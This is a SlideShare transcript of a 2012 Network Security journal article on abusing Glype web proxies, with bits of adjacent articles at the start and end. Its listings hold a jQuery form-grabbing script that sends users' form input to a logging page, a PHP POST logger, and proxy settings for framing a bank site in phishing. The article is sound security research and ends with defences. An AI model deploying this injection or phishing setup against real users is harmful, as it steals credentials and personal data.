Abusing Glype Proxies - Attacks, Exploits and Defences
Upcoming SlideShare
Loading in...5
×
 

Abusing Glype Proxies - Attacks, Exploits and Defences

on

  • 985 views

Details about the different types of attacks associated with Glype proxies.

Details about the different types of attacks associated with Glype proxies.

Statistics

Views

Total Views
985
Views on SlideShare
956
Embed Views
29

Actions

Likes
0
Downloads
5
Comments
0

1 Embed 29

http://www.slideee.com 29

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Abusing Glype Proxies - Attacks, Exploits and Defences Abusing Glype Proxies - Attacks, Exploits and Defences Document Transcript

  • FEATURE 8 Network Security December 2012 Organisations also need to educate their end users, as security is everyone’s concern. Many data leaks caused by insiders are due to careless, not malicious users. Ensure that employees understand security policies and take the proper security precautions. About the Author Bill Morrow is executive chairman and CEO at Quarri Technologies. He has more than 20 years of business foundation and leadership experience. In 2006, he founded CSIdentity Corporation, a wholesale provider of ID theft services across the globe, and served as CEO and chairman of the board into 2011. Previously he founded and served as vice-chairman of the board, director and CEO of Grande Communications. Morrow was the 2010 Ernst & Young Entrepreneur of the Year Award winner for Central Texas. References 1. Camp, Cameron. ‘The BYOD security challenge: How scary is the iPad, tablet, smartphone surge?’ ESET Threat Blog, 28 Feb 2012. Accessed Nov 2012. http://blog.eset.com/2012/02/28/ sizing-up-the-byod-security-challenge. 2. Wilson, Jeff. ‘Enterprises rate mobile device security vendors, reveal BYOD concerns’. Infonetics. 8 Mar 2012. Accessed Nov 2012. www.infonetics.com/pr/2012/ Enterprise-Mobile-Security- Strategies-Survey-Highlights.asp. 3. ‘2011 Internet Security Threat Report’. Symantec, April 2012. Accessed Nov 2012. www.symantec. com/threatreport. 4. ‘Mobile Device Vulnerability Management Flagged as Top Concern for Security Professionals in 2012’. Tenable Network Security, 2 Apr 2012. Accessed Nov 2012. www.tenable.com/news-events/ press-releases/2012-mobile-device- vulnerability-management-flagged-as- top-concern-for-se. 5. ‘2012 Confidential Documents at Risk Study’. Ponemon Institute, 26 Jul 2012. Accessed Nov 2012. http:// info.watchdox.com/Ponemon.html. 6. ‘Survey finds nearly half of consumers fail to upgrade software regularly and one quarter of consumers don’t know why to update software’. Skype, Norton by Symantec and Tom Tom, 23 Jul 2012. Accessed Nov 2012. http:// about.skype.com/press/2012/07/ Abusing Glype proxies: attacks, exploits and defences Glype is an open source proxy written in PHP and is freely available for personal use. It can also be licensed for commercial use, and is available as an add-on for Firefox as Proxilla.2 The basic idea of a web proxy is to download requested web pages, modify them according to a set of proxy rules, and then forward them to the user. By standing between the user and the rest of the web, the proxy can provide some anonymity to the user in addition to other services. Proxies can also be transformed into attack platforms for exploitation. For example, misconfigured proxies can be exploited by an attacker to steal sensitive information from users. Our study focuses on various attacks and the distribution of malware using Glype proxies. We present a model of the approach used by attackers to transform a Glype proxy into an attack toolkit for spreading infections. For our experiments, we have used Glype versions 1.1 and 1.4. We will present details about the features of Glype proxies that help attackers, and we will conclude by proposing countermeasures. Background A number of studies have been conducted in the past regarding the use of public proxies as attack platforms. SANS, a co-operative research and security institution, conducted two studies on the integrity of public proxies. The first, by Powers, discussed the possibility of malware in public proxy lists.3 The study focused on tracking the Koobface malware that used open ports for incoming connections and hid operations behind proxies through proxy lists. The other, by Brozycki, presented techniques for detecting proxies that provide anonymous access and proposed methods to defend against them using blacklisting and active monitoring.4 A number of IDS rules were proposed by Brozycki to prevent users from accessing blocked content inside a network. In this paper, we do not cover network-level anonymisers such as VPNs and TOR. The concept of this paper revolves around web-based anonymity using server-side web proxies. The primary difference between the TOR network and web-based proxies is that TOR implements multi-tier (multi-layer) Aditya K Sood, Michigan State University, Peter Greko, SecNiche Security Labs, and Richard J Enbody, Michigan State University Proxies play a critical privacy role because these are widely used for anonymous surfing and identity cloaking on the Internet. In addition, proxies also assist in traffic filtering, traffic management, log auditing, access policies and surfing restricted sites. There are several types of proxies available, but the Glype HTTP proxy is used extensively.1
  • FEATURE December 2012 Network Security 9 anonymity before forwarding the traffic to the destination, whereas web proxies have a two-tier (single-server) architecture.5 In other words, the difference is in the implementation of relays and routing the traffic between endpoints. Huang et al discussed cache-poisoning attacks in transparent proxies using socket Application Programming Interfaces (APIs) in Java and Flash.6 In cache poisoning attacks, transparent proxies are exploited that are configured to route traffic based on the HTTP ‘Host:’ parameter while caching at the same time. An attacker poisons the Host: header in the cache using a malicious Flash or Java file that downloads the policy file from the attacker’s server. Cache poisoning attacks are quite common in network proxies. The Swiss Security Team discussed the inability of Glype proxies to hide the user’s identity entirely.7 Its study showed how the misconfiguration in Glype proxies can lead to the disclosure of sensitive information. Dissecting Glype The primary purpose of the Glype proxy is to provide the capability of anonymous surfing. However, attackers can also transform a Glype proxy into a malware infection platform. To understand the attacks, it is important to understand the characteristics of Glype proxies. To provide proxy services each URL and each page’s internal links are encoded using a simple, base-64 encoding. For example, consider this URL: hxxp://[Glype_proxy_url]/proxy/browse. php?u=Oi8vc2NyaXB0bWFmaWEub3Jn Lw%3D%3D&b=13&f=norefer This contains the string ‘Oi8vc2NyaXB0bWFmaWEub3JnLw’. A simple base-64 decoding of this string results in ‘://scriptmafia.org’ which shows that the URL decoding process is simple. Care is needed to handle special characters because the Glype proxy follows the PHP-based encoding/ decoding mechanism in which special characters present in variable names are encoded to maintain compatibility with registered global variables. The Glype proxy can be extended using plugins. For example, popular websites such as Facebook, Twitter and Gmail have separate plug-ins for the Glype proxy. Web page processing is handled using Glype’s ‘process.php’ page. For simplicity, the Glype proxy injects JavaScript code in web pages to avoid sending requests to the process.php page using HTTP POST requests. The Glype proxy uses HTTP headers such as ‘Referrer:’ and ‘Location:’ for redirection purposes. Google can be used to search for misconfigured Glype proxies. By default, Glype logs its activities with a log folder in the /tmp directory (/tmp/log). Knowing the location of the log allows a malicious user to easily craft efficient Google queries with Google dorks to search for misconfigured proxies. The Glype proxy has default credentials {username=admin, password=admin}. The password is hardcoded as an MD5 hash, but is susceptible to brute force attack. For secure configurations, the hash should be replaced. In addition, in its default configuration, the Glype proxy uses no cache. Listing 1 shows the implementation of the cache module in Glype proxy. However, it is still possible to configure Glype proxy to send some cache headers using session_cache_ limiter(‘private_no_expire’). Glype proxies suffer from several design flaws that are exploited by attackers. Some of the issues that make Glype proxies an effective hacker tool are discussed below. Logging mechanism By design, the Glype proxy is supposed to provide anonymity for its users. Unfortunately, weaknesses exist that can leak information about a user’s identity. Since Glype is written in PHP, an attacker can perform several modifications to make the Glype proxy a tool for successful execution of attacks. There are different kinds of information that attackers can easily steal by misconfiguring the parameters of the Glype proxy and writing an advanced plugin for capturing data. Listing 2 shows the type of information logged when the user surfs a website through a Glype proxy. It basically captures GET requests and provides information about IP addresses visited. Glype proxies also allow attackers to extract cookies – a potentially valuable Listing 1: Cache module in the Glype proxy # Send no-cache headers. function sendNoCache() { header( ‘Cache-Control: no-store, no-cache, must-revalidate’ ); header( ‘Cache-Control: post-check=0, pre-check=0’, false ); header( ‘Pragma: no-cache’ ); } Listing 2: Logs in Glype Proxy 68.37.xxx.xxx, 07/Mar/2012:21:15:54 -0500, http://m.facebook.com 68.37.xxx.xxx, 07/Mar/2012:21:15:55 -0500, http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/7L0JGfufUnz.png 68.37.xxx.xxx, 07/Mar/2012:21:16:14 -0500, https://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm. facebook.com%2F&refid=8 68.37.xxx.xxx, 07/Mar/2012:21:16:15 -0500, https://s-static.ak.facebook.com/rsrc.php/v1/yz/r/aKhO2tw3FnO.png 68.37.xxx.xxx, 07/Mar/2012:21:17:03 -0500, http://m.facebook.com/home.php?refsrc=http%3A%2F%2Fm.facebook. com%2F&refid=9&m_sess=1h7Hs5-j9bwiFsu&_rdr
  • FEATURE 10 Network Security December 2012 source of personal information. The Glype proxy only provides an option for deleting cookies on the client side, not on the server side. To provide anonymity the cookies should be deleted completely on both sides, but this cannot happen. Listing 3 shows the extracted cookies of a user who visited Facebook. In an attempt to provide anonymity, a Glype proxy does not log POST requests. However, an attacker can write a plugin to grab all POST requests. We developed such a plugin, which we demonstrate in the next section. IP banning and restriction Glype proxies provide impressive functionality to restrict IP addresses using the BlockScript web software.8 It was designed to enable administrators to restrict HTTP requests from unwanted domains. However, this functionality is also useful for launching targeted attacks in which attackers target a specific set of IP addresses and restrict others. Also, this property can subvert the generic analysis method of testing servers remotely. A Glype proxy uses an IP banning module as shown in listing 4. In the code in listing 4, a Glype proxy looks for IP addresses that are restricted or blacklisted to start the verification check. If an IP address is found in the databases, the Glype proxy returns a ‘403 Forbidden’ response to the user. To make it more malicious, attackers can serve malicious web pages showing the IP-banned message. In this way, a user is not able to surf anonymously and still gets infected. There are many modifications that can be made in the code for playing around with IP address restrictions. Listing 3: Cookies collected by Glype Proxy #HttpOnly_.facebook.com TRUE / FALSE 1394475951 datr V4tbT71wsBGdD8j2XZgUBDlJ .facebook.com TRUE / FALSE 0 lsd 1W12c #HttpOnly_.facebook.com TRUE / FALSE 0 m_ts 1331403951 .facebook.com TRUE / FALSE 1 reg_ext_ref deleted .facebook.com TRUE / FALSE 0 reg_fb_gate http%3A%2F%2Fm.facebook.com%2F .facebook.com TRUE / FALSE 0 reg_fb_ref http%3A%2F%2Fm.facebook. com%2F%2522http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyr%2Fr%2FxgDlevwA9Y5.png%2522 Listing 4: IP Banning Module if ( empty($_SESSION[‘ip_verified’]) || $_SESSION[‘ip_verified’] != $_ SERVER[‘REMOTE_ADDR’] ) { if (!$CONFIG[‘enable_blockscript’]) { # Current IP matches a banned IP? true/false $banned = false; # Examine all IP bans foreach ( $CONFIG[‘ip_bans’] as $ip ) { # Is this a range or single? if ( ($pos = strspn($ip, ‘0123456789.’)) == strlen($ip) ) { # Just a single IP so check for a match if ( $_SERVER[‘REMOTE_ADDR’] == $ip ) { # Flag the match and break out the loop $banned = true; break; } # And try next IP continue; } // – – – – – Redacted – – – – – // # Is the IP address banned? if ( $banned ) { # Send a Forbidden header header(‘HTTP/1.1 403 Forbidden’, true, 403); # Print the banned page and exit! echo loadTemplate(‘banned.page’); exit;} # Still here? Must be OK so save IP in session to prevent rechecking next time $_SESSION[‘ip_verified’] = $_SERVER[‘REMOTE_ADDR’];
  • FEATURE December 2012 Network Security 11 Threat model Examining the threat model allows us to understand the role of the various actors involved and how attackers exploit the integrity of users by conducting attacks. The model basically covers the threats associated with end users and administrators. Since we’re concerned here with the Glype proxy, the attacks are modelled around the Man-in-the- Middle (MitM) paradigm. during our research, it has been noticed that Glype proxies are configured in a very insecure way – for example, using default or weak passwords. This misconfiguration allows attackers to successfully compromise the proxy software using brute-force attacks. The primary risk is that attackers now exploit third-party resources – including infrastructure, traffic density, etc – to exploit users at a large scale. Glype is a server-side proxy and compromising it has serious implications. the Glype proxy provides anonymity on the web. The users are susceptible to a wide variety of attacks. The primary target of the attacker is to force the users to surf Internet resources through the Glype proxy. The users’ surfing habits and trust play a significant role in the execution of insidious attacks. Information stealing, phishing, Cross- Frame Scripting (XFS) and so on are some of the attacks that can be triggered easily using Glype proxy. Since the Glype proxy is open source, the code can be modified using inherent features that make it a more powerful weapon. In the next section, we discuss some of the attacks using custom plugins. Remember, Glype is not a client-side proxy but it infects and modifies the proxied web pages served to the users. Launching attacks using Glype Attacks triggered using Glype proxies are based on the concept of the Man- in-the-Middle (MitM) paradigm. The MitM agent reads and writes the traffic between two end points on the network. It is quite easy to equate the Glype proxy with an MitM agent because the traffic originating from the infected machine is routed through the Glype proxy interface before it is processed by the web server. The attacker controls and administers the Glype proxy interface and can easily manipulate the requests and responses flowing between client’s browser and the web server. As a result, the user is served with illegitimate and malicious content that subverts the normal operations of browsers. To support this theory, our team conducted several sets of tests to understand the impact of Glype proxy infection at a large scale. Data exfiltration – form grabbing Data exfiltration attacks are conducted to steal sensitive information from infected machines on the Internet. It is easy to exfiltrate data from users who use Glype proxies. These proxies provide a configuration file for managing the current run state and it appears possible for an attacker to infect all the proxified web pages with illegitimate content. To test that theory, we conducted an experiment to understand the impact of infecting proxied webpages. We noticed that a Glype proxy provides certain configuration parameters that can be used to inject malicious content that gets rendered in all the web pages that are proxied. This capability can be devastating. We implemented a small program using jQuery to grab all the POST requests. Listing 5 provides a different set of scripts that we used in our tests which are described as follows: is used to serialise the data present in the forms. This code serialises the data entered by the users in input boxes in the forms and submits the data to the malicious domain. This code is passed as a parameter to the ‘footer_include’ configuration, and so injects this code at the bottom of all the proxied webpages. that it does not send the form data to the server but rather triggers an alert notification. This code is used for validating successful insertion of scripts in the web pages. used to handle the incoming data and storing it in the log file for analysis. By using the code discussed in listing 5, it is possible to log all the POST requests sent by the user’s browser through the Glype proxy’s interface. The POST data can be logged on the server side as shown in listing 6. Figure 1 shows the successful execution of a script inserted in the proxied web page. This shows that it is very easy to inject scripts automatically by tweaking configuration parameters in the Glype proxy. Cross-frame scripting and phishing Cross-Frame Scripting (XFS) is an advanced attack in which an attacker exploits the inability of web pages to prevent themselves from being framed in a web browser. An attacker loads the target website in an HTML iframe or frame and forces the JavaScript from the primary domain to interact with the target website that is loaded in the frame. XFS allows the attackers to force the legitimate user to perform rogue operations without their knowledge. XFS can be launched to trigger phishing attacks. To counter this attack many websites are using anti XFS code.9 HTML 5 has the built-in attribute ‘sandbox’ defined as a part of an iframe tag that can be used to bypass the restrictions, as described here.10 Despite this fact, a Glype proxy has the ability to rewrite URLs while proxying the content of the domain. A Glype proxy caches the URL and then applies the proxify function to rewrite it. To make it legitimate, an attacker can configure the Glype proxy in such a way that phishing attacks look more original by subverting the XFS protections. We conducted an experiment using Glype proxy version 1.1 and made configuration changes in the settings.php file in order to tweak the Glype proxy to execute a phishing attack. We also modified the code to execute advanced attacks to understand the potential risk associated with a Glype proxy. Listing 7 shows the configuration we used in the demonstration attack code.
  • FEATURE 12 Network Security December 2012 In our code, Secure Socket Layer (SSL) protocol warnings are turned off. This modification allows the Glype proxy to quash all the SSL-based warnings. We also enabled hotlinking, the process of directly loading content from a third-party domain. In a Glype proxy, hotlinking allows the attacker to force the user to visit an XFS web page directly. We enabled caching for faster execution. Caching of files such as CSS, images, and so on forces the browser to store the content locally and use it directly without sending requests to the web server. This way, the attacker can speed up the loading of web pages in the client’s browser. Finally, we allowed JavaScript for communication with different objects on the web page. JavaScript is an essential component of many websites and applications. For example, banking websites use JavaScript for communicating with different objects in a dynamic manner. In addition, the attacker benefits from this because it allows the attacker to execute any arbitrary script in the context of a proxied website. We tested this configuration and found that it is possible to use XFS for conducting a phishing attack as shown in Figure 2. Our experiment showed that sophisticated XFS protections can be circumvented with the help of a Glype proxy. In Figure 2, a legitimate Bank of America website is framed inside a Glype proxy interface without any warnings. It means an attacker can inject scripts as discussed earlier to interact with various objects on the web page. Typically, the user believes that he/she is surfing the bank website through a legitimate proxy but in reality all the information can be easily captured from the user’s session. “It is possible to embed a single exploit code directly in the Glype proxy web page. This process actually transforms the Glype proxy into an attack toolkit” In the above layout, the URL points to the domain where the Glype proxy is hosted. As hotlinking is allowed and the Glype proxy does not present any message, the attacker can also use the Glype proxy URL (pointed to bank domain) and embed it in the phishing emails for distributing among large number of users. When a user clicks the malicious link, he/she is redirected towards the Glype proxy interface that automatically loads the legitimate bank website. An attacker can also install a Listing 5: Injecting Code in Glype Proxy Parameter // – – – – Code (1) – – – – // $CONFIG[‘footer_include’] = ‘<script src=“http://ajax.googleapis.com/ajax/ libs/jquery/1.5/jquery.min.js”></script> <script> $(’form’).submit( function() { var yup = $(’form’).serialize(); $.post(“logit.php”, yup,function (data){}); }); </script>‘; // – – – – Code (2) – – – – // $CONFIG[‘footer_include’] = ‘<script src=“http://ajax.googleapis.com/ajax/ libs/jquery/1.5/jquery.min.js”></script> <script> $(’form’).submit( function() { alert( $(’form’).serialize()); }); </script>‘; // – – – – Code (3) – – – – // <?php $file = fopen(“postlog.txt”, ‘a’); foreach( $_POST as $key => $value ) { fwrite($file, $key.”:”.$value.”n”); } fclose($file); ?> Listing 6: Extracted Data from HTTP POST (FORM Submit) Request lsd: post_form_id:7eb4ce3be4f996e756e1f54ac474d578 charset_test:€,´,€,´,æ°´,Д,Є version:1 ajax:1 width:1280 pxr:1 gps:1 email:FACEBOOK_USER@facebook.com pass:FACEBOOK_PASSWORD m_ts:1332258635 li:MqdoT8wNn91Ak0OT4rUUGUHg
  • FEATURE December 2012 Network Security 13 Glype proxy on familiar-looking domain names to make the phishing attack look more appealing, and hence more effective. Malware distribution Glype proxies can be used for attacking corporate networks to spread infections. Considering the characteristics of a Glype proxy, it is possible for attackers to create an embedded toolkit using a Glype proxy for distributing malware that is highly targeted. The complete model is presented below. Hosting Glype proxy: to begin, the attacker hosts the Glype proxy tool on a compromised domain. As described earlier, web searching can reveal a number of misconfigured Glype proxies on the Internet. It is not difficult for an attacker to hack a misconfigured proxy and use it for malicious purposes. Once a proxy is successfully installed on the compromised domain, the attacker configures it for the attack using scenarios described in earlier sections. There are two primary configuration checks that an attacker wants to implement: attacker to keep track of the activity happening through the proxy. For example, an attacker can install a custom POST logger plugin for stealing data in HTTP POST requests. allows the attacker to restrict certain IP addresses from accessing the Glype proxy. This functionality is useful in targeted infections. Embedding a browser exploit pack in Glype: after successful installation of a Glype proxy, the next step is to embed an iframe having a URL pointing to a Browser Exploit Pack (BEP).11 The iframe can be hidden or obfuscated depending on the requirements. A BEP is a framework that has a number of exploits bundled together. A BEP begins by fingerprinting the user’s browser environment and then serves an appropriate exploit. BlackHole, Phoenix and Crimepack are some of the BEPs that are frequently used for infections. It is possible to embed a single exploit code directly in the Glype proxy web page. This process actually transforms the Glype proxy into an attack toolkit. As discussed earlier, malicious code can be injected dynamically in all the proxied web pages for stealthy infections. The main motive behind this process is to exploit the user’s browser when a proxied web page is opened. Additionally, many proxy users Figure 1: Stealing credentials by injecting code in a Glype proxy. Listing 7: Configuration Parameters Required for Bypassing XFS and Executing Phishing // Configure SSL warnings $CONFIG[‘ssl_warning’] = false; // Managing Hotlinking $CONFIG[‘stop_hotlinking’] = false; // Specifying the target domain for hot linking $CONFIG[‘hotlink_domains’] = array(‘www.bankofamerica.com’); // Storing cookies on the server $CONFIG[‘cookies_on_server’] = true; // Setting cookies path $CONFIG[‘cookies_folder’] = $CONFIG[‘tmp_dir’] . ‘cookies/’; // Enable logging $CONFIG[‘enable_logging’] = true; Figure 2: Phished web page in a Glype proxy.
  • FEATURE 14 Network Security December 2012 believe that surfing online anonymously provides security and neglect to verify the integrity of the Glype proxy. An attacker can exploit this trust. Embedding a malicious link pointing to a BEP is not a hard task in the Glype proxy. Advertising Glype proxy: once the Glype proxy-based attack is set up, the next step is to start advertising the Glype proxy. Advertising is usually done to collect revenue based on hits, but in this case the prime motivation for an attacker is to get traffic so that the infectious code can be distributed. However, advertising can play a critical role in the success of attacks. Several methods are used by attackers to advertise their infected Glype proxies: to advertise their infected Glype proxy. Public proxy lists are one of the most widely accepted methods for advertising Glype proxies. For example, paying a few dollars allows an infected Glype proxy to be numbered in the top-ten proxies, which is a good deal from the attacker’s perspective. This approach can increase traffic on the infected Glype proxy. Figure 3 shows how a proxy can be advertised. attacks to distribute the URL pointing to their infected Glype proxy. Phishing attacks have been effective for exploiting users’ trust and belief in the security of proxies. proxy on social networks, message boards and advertising links. Due to their popularity and trustworthiness, social networks have become the preferred choice of attackers for distributing malware. It is easy and profitable. On completion of this process, attackers have successfully distributed information about their infected Glype proxy to a variety of outlets on the Internet. After this, the attacker waits for the infections to trigger. Post-exploitation: once the infected proxy site has been visited, there are two vectors of attack. If a user is to be directed to a malicious website loaded with malware, the BEP there installs malware on a user’s computer and the computer is owned by the attacker. If the Glype is being used to gather information, the attacker starts mining the logs to track the IP addresses and extract personal information, possibly including account credentials. Information collected from Glype proxies can also be very useful to design other attack vectors. For example, information specific to an individual can be collected for a later, more effective spear-phishing attack. This attack model is typically part of a distributed attack and can be very effective in spreading infections widely. Proactive steps There are several steps that users can take when dealing with Glype proxies for anonymous surfing on the Internet: services for surfing websites that require critical information, such as financial credentials, to be delivered to the server. Users should be aware that their data is being transferred through a public proxy. A classic example would be employees circumventing restrictions put in place by an organisation they work for – such circumvention could open a big hole. legitimate and authentic proxy services on the Internet. However, it is still not advised to use the services directly. A user should verify the integrity of a proxy provider to check whether it is a legitimate service provider or a fraudulent entity. for internal use, it should be ensured that the Glype proxy is configured in a secure way. Default credentials must be changed to stronger ones. Log files should not be publicly accessible, which can be achieved by configuring the settings.php and .htaccess files on the server. good surfing habits on the Internet. For example, they should always think twice before clicking a link that is embedded in an email. Additionally, they should be suspicious of attachments and verify them before downloading.Theseoperationalhabits depend on the security knowledge of the user and show the importance of user education. Organisations should have a robust security training model to educate users about the latest web attack trends and appropriate secure behaviour. The steps discussed above can be effective in reducing the infection rate and preserving the integrity of users. Conclusion Glype proxies have been increasing in popularity over the past few years. Generally, Glype proxies assist in maintaining a user’s integrity and privacy. However, they can also be used as an attack platform because of some inherent design flaws. First, insecure configuration of Glype proxies can result in the stealing of information. Second, attackers can extend the Glype proxy code to conduct Figure 3: Advertising proxies on the Internet.
  • FEATURE December 2012 Network Security 15 web-based attacks by tricking a user to visit a malicious domain or routing the web traffic through Glype proxies. Finally, security greatly depends on users’ ability to make secure decisions when on the Internet. Secure behaviour can help thwart a number of attack scenarios. Be vigilant and surf securely. About the authors Aditya K Sood is a senior security practitioner and PhD candidate at Michigan State University. He has already worked in the security domain for Armorize, COSEINC and KPMG. He is also a founder of SecNiche Security, an independent security research lab. He has been an active speaker at industry conferences such as DEFCON, HackInTheBox, LayerOne, Source, RSA, BruCon, ToorCon, HackerHalted, TRISC, EuSecwest, XCON, Troopers, OWASP AppSec, US-CERT GFIRST and many others. He has authored several papers for various publishers including IEEE, Elsevier, Crosstalk, Virus Bulletin, ISACA, ISSA and HITB. Peter Greko is a security researcher at SecNiche Security Labs where he deals with cyber-security issues. Previously he has worked in the cyber-security divisions of Sypris and Citigroup. He has spoken at several conferences, including HackerHalted, AppSec DC, HOPE, Swiss CyberStorm and local OWASP and ISSA chapter meetings. Richard J Enbody, PhD is associate professor in the Department of Computer Science and Engineering at Michigan State University (US) where he joined the faculty in 1987. He earned his PhD at the University of Minnesota (1987) and his BA at Carleton College (1976). His research interests include computer security, computer architecture, web-based distance education, and CS1 education. Enbody has written a CS1 text using Python: ‘The Practice of Computing Using Python, Second Edition’, published by Addison- Wesley 2012. References 1. Glype proxy. Accessed Nov 2012. www.glype.com. 2. Proxilla Glype Proxy Client – Mozilla Firefox Add-On. Accessed Nov 2012. https://addons.mozilla.org/en-US/ firefox/addon/proxilla/. 3. Powers, JL. ‘Tracking Malware with Public Proxy Lists’. SANS Reading Room. Accessed Nov 2012. www. sans.org/reading_room/whitepapers/ malicious/tracking-malware-public- proxy-lists_33604. 4. Brozycki, Z. ‘Detecting and Preventing Anonymous Proxy Usage’. SANS Reading Room. Accessed Nov 2012. www.sans.org/reading_room/ whitepapers/detection/detecting- preventing-anonymous-proxy- usage_32943. 5. ‘TOR (The Onion Router)’. University of Michigan. Accessed Nov 2012. http://webapps.lsa.umich.edu/ lsait/admin/TOR%20Routing%20 Infomation%20.pdf. 6. Huang, L; Chen, EY; Barth, A; Rescorla, E; Jackson, C. ‘Talking to Yourself for Fun and Profit’. Accessed Nov 2012. www.w2spconf.com/2011/ papers/websocket.pdf. 7. ‘When You Think You Surf Anonymously But You Don’t’. Swiss Security Blog, 26 Apr 2010. Accessed Nov 2012. www.abuse.ch/?p=2534. 8. BlockScript, home page. Accessed Nov 2012. www.blockscript.com. 9. Rydstedt, G; Bursztein, E; Boneh, D; Jackson, C. ‘Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites’. Stanford SecLab, 20 Jul 2010. Accessed Nov 2012. http://seclab.stanford.edu/websec/ framebusting/framebust.pdf. 10.Sood, AK; Enbody, RJ. ‘Frametrapping the framebusting defence’. Network Security, October 2011. Accessed Nov 2012. www.sciencedirect.com/science/ article/pii/S1353485811701052. 11.Sood, AK; Enbody, RJ. ‘Browser Exploit Packs – Exploitation Tactics’. ToorCon Security Conference, October 2011, San Diego. Accessed Nov 2012. http://secniche.blogspot. com/2011/06/toorcon-seattle-2011- browser-exploit.html. Virtual jihad: how real is the threat? Steve Gold One of the less well reported aspects of cybercrime – and one that poses a very real threat to the integrity of companies’ IT resources, as well as that of Western governments – is the issue of cyber-terrorism. According to Dancho Danchev, an Amsterdam-based security blogger with Webroot, and an Internet/ security researcher since the mid-1990s, the reason for this is largely because of a lack of understanding of what cyber-jihadism is all about. Coupled with a lack of understanding about the teachings of the Koran and Islamic faith, this has resulted in the topic becoming something of a no-go area for Western security researchers, despite the fact that the more extremist elements in Islamic countries are increasingly using relatively advanced technology in the shape of Steve Gold, freelance journalist There is widespread concern about the ways in which terrorist organisations – and particularly jihadist movements – may be using the Internet to organise and execute acts of terror. But is the threat real, or is it a case of an IT security industry generating fear, uncertainty and doubt in an attempt to instil fear into every Internet user?